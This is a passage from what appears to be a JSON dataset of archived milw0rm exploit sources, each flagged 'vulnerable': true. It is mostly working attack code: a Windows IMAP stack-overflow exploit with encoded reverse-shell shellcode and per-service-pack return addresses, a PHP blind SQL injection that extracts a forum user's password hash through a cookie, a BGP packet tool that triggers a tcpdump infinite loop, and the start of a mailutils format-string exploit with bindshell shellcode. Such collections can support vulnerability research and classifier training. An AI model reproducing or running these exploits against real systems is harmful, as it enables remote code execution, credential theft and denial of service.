cmdshell (int sock);\n\nlong gimmeip(char *hostname);\n\nchar buffer[2500];\n\n\n\n//special stuff\n\nchar* alphaEncodeShellcode(char *shellcode, int size);\n\n// un-crypted shellcode that we'll fill our retn values, then encode.\n\nchar unEncShellcode[]=\n\n\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\"\n\n\"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\"\n\n\"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\"\n\n\"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\"\n\n\"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\"\n\n\"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\"\n\n\"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\"\n\n\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\"\n\n\"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\"\n\n\"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x68\"\n\n//160 above, ip next 4 bytes then, pass 2 theres port\n\n\"\\x64\\x64\\x64\\x64\\x66\\x68\\x0d\\x05\\x66\\x53\\x89\\xe1\\x95\\x68\\xec\\xf9\"\n\n\"\\xaa\\x60\\x57\\xff\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\\x68\"\n\n\"\\x63\\x6d\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\\xe2\\x31\\xc0\\xf3\"\n\n\"\\xaa\\x95\\x89\\xfd\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x8d\\x7a\\x38\\xab\\xab\\xab\"\n\n\"\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x28\\xff\\xd6\\x5b\\x57\\x52\\x51\\x51\\x51\"\n\n\"\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\\xff\\xd6\"\n\n\"\\x6a\\xff\\xff\\x37\\xff\\xd0\\x68\\xe7\\x79\\xc6\\x79\\xff\\x75\\x04\\xff\\xd6\"\n\n\"\\xff\\x77\\xfc\\xff\\xd0\\x68\\xef\\xce\\xe0\\x60\\x53\\xff\\xd6\\xff\\xd0\";\n\n\n\n//modified encoded alpha num SUB ECX, 2E8 JMP ECX\n\nchar jmpBack[]=\n\n\"VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089\"\n\n\"IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIoqYyKHTB30WpyoKQAPA\";\n\nint paddingSize; // change when changing shellcode. 676 bytes - shellcodesize = this.\n\nchar jmp2KSP4[] = \"\\x40\\x43\\x44\\x78\"; //JMP EBX 2000 SP4 TESTED\n\nchar jmp2KSP3[] = \"\\x40\\x23\\x44\\x78\"; //JMP EBX 2000 SP3\n\nchar jmp2KSP2[] = \"\\x40\\x21\\x46\\x78\"; //JMP EBX 2000 SP2\n\nchar jmp2KSP1[] = \"\\x62\\x54\\x30\\x77\"; //POP POP RETN 2000 SP1 (no jmp ebx)\n\nchar jmp2KSP0[] = \"\\x6C\\x30\\x6B\\x77\"; //JMP EBX 2000 SP0\n\nchar jmpXPSP0[] = \"\\x63\\x4F\\x60\\x77\"; //JMP EBX WinXP SP0 no SEH XOR prot so JMP EBX is ok\n\n\n\nint main(int argc,char *argv[])\n\n{     \n\n\t\tWSADATA wsaData;\n\n\t\tstruct sockaddr_in targetTCP;\n\n\t\tint sockTCP;\n\n\t\tunsigned short port = 143;\n\n\t\tlong ip;\n\n\t\tif(argc < 5)\n\n\t\t{\n\n\t\t\tprintf(\"IpSwitch IMAP server Remote Stack Overflow.\\n\"\n\n\t\t\t\t\"This exploit uses a reverse shell payload.\\n\"\n\n\t\t\t\t\"Usage: %s [retnaddr] [retport] [target] [address] <port_to_exploit>\\n\"\n\n\t\t\t\t\" eg: %s 192.168.1.94 1564 2 192.168.1.95\\n\"\n\n\t\t\t\t\"Targets:\\n\"\n\n\t\t\t\t\"1. Windows XP SP 0.\\n2. Windows 2000 SP4\\n3. Windows 2000 SP3\\n\"\n\n\t\t\t\t\"4. Windows 2000 SP2\\n5. Windows 2000 SP1\\n6. Windows 2000 SP0\\n\"\n\n\t\t\t\t\"Read comments in source code for more info.\\n\"\n\n\t\t\t\t\"Coded by nolimit@CiSO and BuzzDee.\\n\",argv[0],argv[0]);\n\n\t\t\treturn 1;\t\t\t\n\n\t\t}\t\t\n\n\t\tif(argc==6)\n\n\t\t\tport = atoi(argv[5]);\t\t\t\t\t\n\n        \tWSAStartup(0x0202, &wsaData);\t\t\t\t\n\n\t\tprintf(\"[*] Target:\\t%s \\tPort: %d\\n\\n\",argv[4],port);\n\n\t\tip=gimmeip(argv[4]);\t\n\n        \ttargetTCP.sin_family = AF_INET;\n\n        \ttargetTCP.sin_addr.s_addr = ip;\n\n        \ttargetTCP.sin_port = htons(port);\n\n\t\t//set ip/port specified. Probably could have done this easier, but whatever.\n\n\t\tunsigned long revIp = gimmeip(argv[1]);\n\n\t\tunsigned long *revPtr = (unsigned long *)&unEncShellcode;\n\n\t\trevPtr = revPtr + (160/4); //go to ip place, it adds by 4, and it's 160 bytes away.\n\n\t\t*revPtr = revIp;\n\n\t\tchar *portPtr = (char *)revPtr + 6; //ptr + 2 bytes past\n\n\t\tint rPort = atoi(argv[2]);\n\n\t\tchar *revPortPtr = (char *)&rPort;\n\n\t\tmemcpy(portPtr,revPortPtr+1,1);\n\n\t\tmemcpy(portPtr+1,revPortPtr,1);\n\n\t\t//done formatting, now lets encode it.\n\n\t\tchar *shellcode = alphaEncodeShellcode(unEncShellcode,sizeof(unEncShellcode));\n\n\t\tpaddingSize = 676 - strlen(shellcode);\n\n\t\t//form buffer here.\n\n\t\tmemset(buffer,'\\x00',2500);\n\n\t\tstrcpy(buffer,\"A001 LOGIN user@\");\n\n\t\tmemset(buffer+16,'\\x41',paddingSize); //INC ECX nopslide\n\n\t\tstrcat(buffer,shellcode);\n\n\t\tstrcat(buffer,\"r!s!\"); //jmp over SE handler\n\n\t\tswitch(atoi(argv[3]))\n\n\t\t{\n\n\t\t\tcase 1:\n\n\t\t\tprintf(\"[*] Targetting Windows XP SP 0..\\n\");\n\n\t\t\tstrcat(buffer,jmpXPSP0);\n\n\t\t\tbreak;\n\n\t\t\tcase 2:\n\n\t\t\tprintf(\"[*] Targetting Windows 2000 SP4..\\n\");\n\n\t\t\tstrcat(buffer,jmp2KSP4);\n\n\t\t\tbreak;\n\n\t\t\tcase 3:\n\n\t\t\tprintf(\"[*] Targetting Windows 2000 SP3..\\n\");\n\n\t\t\tstrcat(buffer,jmp2KSP3);\n\n\t\t\tbreak;\n\n\t\t\tcase 4:\n\n\t\t\tprintf(\"[*] Targetting Windows 2000 SP2..\\n\");\n\n\t\t\tstrcat(buffer,jmp2KSP2);\n\n\t\t\tbreak;\n\n\t\t\tcase 5:\n\n\t\t\tprintf(\"[*] Targetting Windows 2000 SP1..\\n\");\n\n\t\t\tstrcat(buffer,jmp2KSP1);\n\n\t\t\tbreak;\n\n\t\t\tcase 6:\n\n\t\t\tprintf(\"[*] Targetting Windows 2000 SP0..\\n\");\n\n\t\t\tstrcat(buffer,jmp2KSP0);\n\n\t\t\tbreak;\n\n\t\t\tdefault:\n\n\t\t\tprintf(\"Target error.\\n\");\n\n\t\t\treturn 1;\n\n\t\t\tbreak;\n\n\t\t}\n\n\t\tmemset(buffer+strlen(buffer),'\\x41',29);\n\n\t\tstrcat(buffer,jmpBack); //decodes to jmp back to top part of buffer\n\n\t\tmemset(buffer+strlen(buffer),'\\x41',1323);\n\n\t\tstrcat(buffer,\" nolimits\\r\\n\");\n\n\t\t//buffer formed\n\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\n\n\t\t{\n\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\n\n\t\t\t\tWSACleanup();\n\n                return 1;\n\n\t\t}\n\n\t\tprintf(\"[*] Socket initialized...\\n\");\t\t\t\t\t\n\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\n\n\t\t{\n\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\texit(1);\n\n\t\t} \t\t\n\n\t\tprintf(\"[*] Sending  buffer.\\n\");\n\n\t\tSleep(1000);\n\n\t\tif (send(sockTCP, buffer, strlen(buffer),0) == -1)\n\n\t\t{\n\n\t\t\t\tprintf(\"[x] Failed to inject packet! Exiting...\\n\");\n\n\t\t\t\tWSACleanup();\n\n                return 1;\n\n\t\t}\n\n\t\tSleep(1000);\n\n\t\tclosesocket(sockTCP);\n\n\t\tWSACleanup();\n\n\t\tprintf(\"Exploit sent. Reverse Shell should be comming if everyhing worked.\\n\");\n\n\t\treturn 0;\n\n}\n\n\n\n/*********************************************************************************/\n\nlong gimmeip(char *hostname) \n\n{\n\n\tstruct hostent *he;\n\n\tlong ipaddr;\n\n\t\n\n\tif ((ipaddr = inet_addr(hostname)) < 0) \n\n\t{\n\n\t\tif ((he = gethostbyname(hostname)) == NULL) \n\n\t\t{\n\n\t\t\tprintf(\"[x] Failed to resolve host: %s! Exiting...\\n\\n\",hostname);\n\n\t\t\tWSACleanup();\n\n\t\t\texit(1);\n\n\t\t}\n\n\t\tmemcpy(&ipaddr, he->h_addr, he->h_length);\n\n\t}\t\n\n\treturn ipaddr;\n\n}\n\n/*********************************************************************************/\n\n\n\n//Below here, all code is modified code from ALPHA 2: Zero-tolerance by Berend-Jan Wever.\n\n//  aka Skylined  <skylined@edup.tudelft.nl>. Hats off to him.\n\n\n\n//ecx ascii decoder.\n\n#define ecx_mixedcase_ascii_decoder\t\"IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI\"\n\n// shellcode ptr & size\n\nchar* alphaEncodeShellcode(char *shellcode, int size)\n\n{\n\n\tint   i, input, A, B, C, D, E, F;\n\n\tchar* valid_chars=\"0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\";\n\n\t//first, create a big enough shellcode memory section\n\n\tchar *encShellcode = (char *) malloc(sizeof((ecx_mixedcase_ascii_decoder) + (size * 2)));\n\n\tstrcpy(encShellcode,ecx_mixedcase_ascii_decoder);\n\n\tchar buff[4];\n\n\tint z=0;\n\n\tfor(;z < size;z++)\n\n\t{\n\n\t\t // encoding AB -> CD 00 EF 00\n\n\t\tA = (shellcode[z] & 0xf0) >> 4;\n\n\t\tB = (shellcode[z] & 0x0f);\n\n\n\n\t\tF = B;\n\n\t\t// E is arbitrary as long as EF is a valid character\n\n\t\ti = rand() % strlen(valid_chars);\n\n\t\twhile ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }\n\n\t\tE = valid_chars[i] >> 4;\n\n\t\t// normal code uses xor, unicode-proof uses ADD.\n\n\t\t// AB ->\n\n\t\tD =  0 ? (A-E) & 0x0f : (A^E);\n\n\t\t// C is arbitrary as long as CD is a valid character\n\n\t\ti = rand() % strlen(valid_chars);\n\n\t\twhile ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }\n\n\t\tC = valid_chars[i] >> 4;\n\n\t\t//edit, use curChar ptr to strncpy it.\n\n\t\t//printf(\"%c%c\", (C<<4)+D, (E<<4)+F);\n\n\t\tsprintf(buff,\"%c%c\",(C<<4)+D, (E<<4)+F);\n\n\t\tstrcat(encShellcode,buff);\n\n\t}\n\n\treturn encShellcode;\n\n}\n\n\n\n// milw0rm.com [2005-06-07]",
205        "vulnerable": true
206    },
207    {
208        "exploit_id": 1036,
209        "content": "<?php\n\n/* \n\n<= 1.3.1 Final\n\n/str0ke\n\n*/\n\n\n\n$server = \"SERVER\";\n\n$port = 80;\n\n$file = \"PATH\";\n\n\n\n$target = 81;\n\n\n\n/* User id and password used to fake-logon are not important. '10' is a\n\nrandom number. */\n\n$id = 10;\n\n$pass = \"\";\n\n\n\n$hex = \"0123456789abcdef\";\n\nfor($i = 1; $i <= 32; $i++ ) {\n\n        $idx = 0;\n\n        $found = false;\n\n\n\n        while( !($found) ) {\n\n                $letter = substr($hex, $idx, 1);\n\n\n\n                /* %2527 translates to %27, which gets past magic quotes.\n\nThis is translated to ' by urldecode. */\n\n                $cookie =\n\n\"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target\";\n\n                $cookie .=\n\n\"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527\" . $letter;\n\n\n\n                /* Query is in effect: SELECT * FROM ibf_members\n\n                                       WHERE id=$id AND password='$pass' OR\n\nid=$target\n\n                                       HAVING id=$target AND\n\nMID(`password`,$i,1)='$letter' */\n\n\n\n                $header = getHeader($server, $port, $file .\n\n\"index.php?act=Login&CODE=autologin\", $cookie);\n\n                if( !preg_match('/Location:(.*)act\\=Login\\&CODE\\=00\\r\\n/',\n\n$header) ) {\n\n                        echo $i . \": \" . $letter . \"\\n\";\n\n                        $found = true;\n\n\n\n                        $hash .= $letter;\n\n                } else {\n\n                        $idx++;\n\n                }\n\n        }\n\n}\n\n\n\necho \"\\n\\nFinal Hash: $hash\\n\";\n\n\n\nfunction getHeader($server, $port, $file, $cookie) {\n\n        $ip = gethostbyname($server);\n\n        $fp = fsockopen($ip, $port);\n\n\n\n        if (!$fp) {\n\n                return \"Unknown\";\n\n        } else {\n\n                $com = \"HEAD $file HTTP/1.1\\r\\n\";\n\n                $com .= \"Host: $server:$port\\r\\n\";\n\n                $com .= \"Cookie: $cookie\\r\\n\";\n\n                $com .= \"Connection: close\\r\\n\";\n\n                $com .= \"\\r\\n\";\n\n\n\n                fputs($fp, $com);\n\n\n\n                do {\n\n                        $header.= fread($fp, 512);\n\n                } while( !preg_match('/\\r\\n\\r\\n$/',$header) );\n\n        }\n\n\n\n        return $header;\n\n}\n\n?>\n\n\n\n// milw0rm.com [2005-06-08]",
210        "vulnerable": true
211    },
212    {
213        "exploit_id": 1037,
214        "content": "/*\n\n* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite\n\n* loop vulnerability.\n\n*\n\n* libnet 1.1\n\n* Build a BGP4 update message with what you want as payload\n\n*\n\n* Copyright (c) 2003 Fr d ric Raynal <pappy at security-labs organization>\n\n* All rights reserved.\n\n*\n\n* Examples:\n\n*\n\n* empty BGP UPDATE message:\n\n*\n\n* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2\n\n* libnet 1.1 packet shaping: BGP4 update + payload[raw]\n\n* Wrote 63 byte TCP packet; check the wire.\n\n*\n\n* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]\n\n* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)\n\n* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....\n\n* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........\n\n* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............\n\n* 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ...............\n\n*\n\n*\n\n* BGP UPDATE with Path Attributes and Unfeasible Routes Length\n\n*\n\n* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf \"\\x01\\x02\\x03\"` -A 3 -W 13\n\n* libnet 1.1 packet shaping: BGP4 update + payload[raw]\n\n* Wrote 79 byte TCP packet; check the wire.\n\n*\n\n* 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]\n\n* 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79)\n\n* 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s.....\n\n* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........\n\n* 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P...............\n\n* 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA\n\n* 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA.....\n\n*\n\n*\n\n* BGP UPDATE with Reachability Information\n\n*\n\n* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7\n\n* libnet 1.1 packet shaping: BGP4 update + payload[raw]\n\n* Wrote 70 byte TCP packet; check the wire.\n\n*\n\n* 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]\n\n* 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70)\n\n* 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s.....\n\n* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........\n\n* 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m..........\n\n* 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C\n\n* 0x0040 4343 4343 4343 CCCCCC\n\n*\n\n*\n\n* Redistribution and use in source and binary forms, with or without\n\n* modification, are permitted provided that the following conditions\n\n* are met:\n\n* 1. Redistributions of source code must retain the above copyright\n\n* notice, this list of conditions and the following disclaimer.\n\n* 2. Redistributions in binary form must reproduce the above copyright\n\n* notice, this list of conditions and the following disclaimer in the\n\n* documentation and/or other materials provided with the distribution.\n\n*\n\n* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND\n\n* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n\n* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n\n* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE\n\n* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n\n* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n\n* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n\n* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n\n* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n\n* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n\n* SUCH DAMAGE.\n\n*\n\n*/\n\n\n\n/* #if (HAVE_CONFIG_H) */\n\n/* #include \"../include/config.h\" */\n\n/* #endif */\n\n/* #include \"./libnet_test.h\" */\n\n#include <libnet.h>\n\n\n\nvoid\n\nusage(char *name);\n\n\n\n\n\n#define set_ptr_and_size(ptr, size, val, flag) \\\n\nif (size && !ptr) \\\n\n{ \\\n\nptr = (u_char *)malloc(size); \\\n\nif (!ptr) \\\n\n{ \\\n\nprintf(\"memory allocation failed (%u bytes requested)\\n\", size); \\\n\ngoto bad; \\\n\n} \\\n\nmemset(ptr, val, size); \\\n\nflag = 1; \\\n\n} \\\n\n\\\n\nif (ptr && !size) \\\n\n{ \\\n\nsize = strlen(ptr); \\\n\n}\n\n\n\n\n\n\n\nint\n\nmain(int argc, char *argv[])\n\n{\n\nint c;\n\nlibnet_t *l;\n\nu_long src_ip, dst_ip, length;\n\nlibnet_ptag_t t = 0;\n\nchar errbuf[LIBNET_ERRBUF_SIZE];\n\nint pp;\n\nu_char *payload = NULL;\n\nu_long payload_s = 0;\n\nu_char marker[LIBNET_BGP4_MARKER_SIZE];\n\n\n\nu_short u_rt_l = 0;\n\nu_char *withdraw_rt = NULL;\n\nchar flag_w = 0;\n\nu_short attr_l = 0;\n\nu_char *attr = NULL;\n\nchar flag_a = 0;\n\nu_short info_l = 0;\n\nu_char *info = NULL;\n\nchar flag_i = 0;\n\n\n\nprintf(\"libnet 1.1 packet shaping: BGP4 update + payload[raw]\\n\");\n\n\n\n/*\n\n* Initialize the library. Root priviledges are required.\n\n*/\n\nl = libnet_init(\n\nLIBNET_RAW4, /* injection type */\n\nNULL, /* network interface */\n\nerrbuf); /* error buffer */\n\n\n\nif (l == NULL)\n\n{\n\nfprintf(stderr, \"libnet_init() failed: %s\", errbuf);\n\nexit(EXIT_FAILURE);\n\n}\n\n\n\nsrc_ip = 0;\n\ndst_ip = 0;\n\nmemset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);\n\nmemset(marker, 0xff, LIBNET_BGP4_MARKER_SIZE);\n\n\n\nwhile ((c = getopt(argc, argv, \"d:s:t:m:p:w:W:a:A:i:I:\")) != EOF)\n\n{\n\nswitch (c)\n\n{\n\n/*\n\n* We expect the input to be of the form `ip.ip.ip.ip.port`. We\n\n* point cp to the last dot of the IP address/port string and\n\n* then seperate them with a NULL byte. The optarg now points to\n\n* just the IP address, and cp points to the port.\n\n*/\n\ncase 'd':\n\nif ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)\n\n{\n\nfprintf(stderr, \"Bad destination IP address: %s\\n\", optarg);\n\nexit(EXIT_FAILURE);\n\n}\n\nbreak;\n\n\n\ncase 's':\n\nif ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)\n\n{\n\nfprintf(stderr, \"Bad source IP address: %s\\n\", optarg);\n\nexit(EXIT_FAILURE);\n\n}\n\nbreak;\n\n\n\ncase 'p':\n\npayload = optarg;\n\npayload_s = strlen(payload);\n\nbreak;\n\n\n\ncase 'w':\n\nwithdraw_rt = optarg;\n\nbreak;\n\n\n\ncase 'W':\n\nu_rt_l = atoi(optarg);\n\nbreak;\n\n\n\ncase 'a':\n\nattr = optarg;\n\nbreak;\n\n\n\ncase 'A':\n\nattr_l = atoi(optarg);\n\nbreak;\n\n\n\ncase 'i':\n\ninfo = optarg;\n\nbreak;\n\n\n\ncase 'I':\n\ninfo_l = atoi(optarg);\n\nbreak;\n\n\n\ndefault:\n\nexit(EXIT_FAILURE);\n\n}\n\n}\n\n\n\nif (!src_ip || !dst_ip)\n\n{\n\nusage(argv[0]);\n\ngoto bad;\n\n}\n\n\n\nset_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w);\n\nset_ptr_and_size(attr, attr_l, 0x42, flag_a);\n\nset_ptr_and_size(info, info_l, 0x43, flag_i);\n\n\n\n/*\n\n* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump\n\n* infinite loop vulnerability.\n\n*/\n\nif (payload == NULL) {\n\nif ((payload = malloc(16)) == NULL) {\n\nfprintf(stderr, \"Out of memory\\n\");\n\nexit(1);\n\n}\n\npp = 0;\n\npayload[pp++] = 0;\n\npayload[pp++] = 33;\n\npayload_s = pp;\n\n}\n\n\n\n/*\n\n* BGP4 update messages are \"dynamic\" are fields have variable size. The only\n\n* sizes we know are those for the 2 first fields ... so we need to count them\n\n* plus their value.\n\n*/\n\nlength = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s;\n\nt = libnet_build_bgp4_update(\n\nu_rt_l, /* Unfeasible Routes Length */\n\nwithdraw_rt, /* Withdrawn Routes */\n\nattr_l, /* Total Path Attribute Length */\n\nattr, /* Path Attributes */\n\ninfo_l, /* Network Layer Reachability Information length */\n\ninfo, /* Network Layer Reachability Information */\n\npayload, /* payload */\n\npayload_s, /* payload size */\n\nl, /* libnet handle */\n\n0); /* libnet id */\n\nif (t == -1)\n\n{\n\nfprintf(stderr, \"Can't build BGP4 update header: %s\\n\", libnet_geterror(l));\n\ngoto bad;\n\n}\n\n\n\nlength+=LIBNET_BGP4_HEADER_H;\n\nt = libnet_build_bgp4_header(\n\nmarker, /* marker */\n\nlength, /* length */\n\nLIBNET_BGP4_UPDATE, /* message type */\n\nNULL, /* payload */\n\n0, /* payload size */\n\nl, /* libnet handle */\n\n0); /* libnet id */\n\nif (t == -1)\n\n{\n\nfprintf(stderr, \"Can't build BGP4 header: %s\\n\", libnet_geterror(l));\n\ngoto bad;\n\n}\n\n\n\nlength+=LIBNET_TCP_H;\n\nt = libnet_build_tcp(\n\n0x6666, /* source port */\n\n179, /* destination port */\n\n0x01010101, /* sequence number */\n\n0x02020202, /* acknowledgement num */\n\nTH_SYN, /* control flags */\n\n32767, /* window size */\n\n0, /* checksum */\n\n0, /* urgent pointer */\n\nlength, /* TCP packet size */\n\nNULL, /* payload */\n\n0, /* payload size */\n\nl, /* libnet handle */\n\n0); /* libnet id */\n\nif (t == -1)\n\n{\n\nfprintf(stderr, \"Can't build TCP header: %s\\n\", libnet_geterror(l));\n\ngoto bad;\n\n}\n\n\n\nlength+=LIBNET_IPV4_H;\n\nt = libnet_build_ipv4(\n\nlength, /* length */\n\n0, /* TOS */\n\n242, /* IP ID */\n\n0, /* IP Frag */\n\n64, /* TTL */\n\nIPPROTO_TCP, /* protocol */\n\n0, /* checksum */\n\nsrc_ip, /* source IP */\n\ndst_ip, /* destination IP */\n\nNULL, /* payload */\n\n0, /* payload size */\n\nl, /* libnet handle */\n\n0); /* libnet id */\n\nif (t == -1)\n\n{\n\nfprintf(stderr, \"Can't build IP header: %s\\n\", libnet_geterror(l));\n\ngoto bad;\n\n}\n\n\n\n/*\n\n* Write it to the wire.\n\n*/\n\nc = libnet_write(l);\n\nif (c == -1)\n\n{\n\nfprintf(stderr, \"Write error: %s\\n\", libnet_geterror(l));\n\ngoto bad;\n\n}\n\nelse\n\n{\n\nfprintf(stderr, \"Wrote %d byte TCP packet; check the wire.\\n\", c);\n\n}\n\n\n\nif (flag_w) free(withdraw_rt);\n\nif (flag_a) free(attr);\n\nif (flag_i) free(info);\n\n\n\nlibnet_destroy(l);\n\nreturn (EXIT_SUCCESS);\n\nbad:\n\nif (flag_w) free(withdraw_rt);\n\nif (flag_a) free(attr);\n\nif (flag_i) free(info);\n\n\n\nlibnet_destroy(l);\n\nreturn (EXIT_FAILURE);\n\n}\n\n\n\nvoid\n\nusage(char *name)\n\n{\n\nfprintf(stderr,\n\n\"usage: %s -s source_ip -d destination_ip \\n\"\n\n\" [-m marker] [-p payload] [-S payload size]\\n\"\n\n\" [-w Withdrawn Routes] [-W Unfeasible Routes Length]\\n\"\n\n\" [-a Path Attributes] [-A Attribute Length]\\n\"\n\n\" [-i Reachability Information] [-I Reachability Information length]\\n\",\n\nname);\n\n}\n\n\n\n// milw0rm.com [2005-06-09]",
215        "vulnerable": true
216    },
217    {
218        "exploit_id": 1038,
219        "content": "/*\n\n   gun-imapd.c\n\n   \"\"\"\"\"\"\"\"\"\"\"\n\n\n\n   gnu mailutils-0.5 - < mailutils-0.6.90 remote formatstring exploit\n\n  \n\n   written and tested on FC3.\n\n   this is a first testing version and the onlyone to go public.\n\n   \n\n\n\n   by\n\n      qobaiashi@u-n-f.com\n\n\n\n*/\n\n\n\n\n\n\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <unistd.h>\n\n#include <stdlib.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n#include <netdb.h>\n\n#include <sys/types.h>\n\n#include <sys/stat.h>\n\n#include <fcntl.h>\n\n\n\n// to be modified\n\n#define  GOT  0x080573fc \n\n\n\nstatic char bindshell[]= //by pr1 bind to :4096 \n\n\"\\x31\\xc0\"              //  xor    %eax,%eax\n\n\"\\x50\"                  //  push  %eax\n\n\"\\x40\"                  //  inc    %eax\n\n\"\\x89\\xc3\"              //  mov    %eax,%ebx\n\n\"\\x40\"                  //  inc    %eax\n\n\"\\x53\"                  //  push  %ebx\n\n\"\\x50\"                          //  push  %eax\n\n\"\\x89\\xe1\"                      //  mov    %esp,%ecx\n\n\"\\xb0\\x66\"                      //  mov    $0x66,%al\n\n\"\\xcd\\x80\"              //  int    $0x80\n\n\"\\x31\\xd2\"              //  xor    %edx,%edx\n\n\"\\x52\"                  //  push  %edx\n\n\"\\x43\"                  //  inc    %ebx\n\n\"\\x6a\\x10\"              //  push  $0x10\n\n\"\\x66\\x53\"              //  push  %bx\n\n\"\\x89\\xe1\"                      //  mov    %esp,%ecx\n\n\"\\x6a\\x10\"              //  push  $0x10\n\n\"\\x51\"                  //  push  %ecx\n\n\"\\x50\"                  //  push  %eax\n\n\"\\x89\\xe1\"              //  mov    %esp,%ecx\n\n\"\\xb0\\x66\"                      //  mov    $0x66,%al\n\n\"\\xcd\\x80\"              //  int    $0x80\n\n\"\\xd1\\xe3\"              //  shl    %ebx\n\n\"\\xb0\\x66\"              //  mov    $0x66,%al\n\n\"\\xcd\\x80\"              //  int    $0x80\n\n\"\\x58\"                  //  pop    %eax\n\n\"\\x52\"                          //  push  %edx\n\n\"\\x50\"                          //  push  %eax\n\n\"\\x43\"                          //  inc    %ebx\n\n\"\\x89\\xe1\"              //  mov    %esp,%ecx\n\n\"\\xb0\\x66\"              //  mov    $0x66,%al\n\n\"\\xcd\\x80\"              //  int    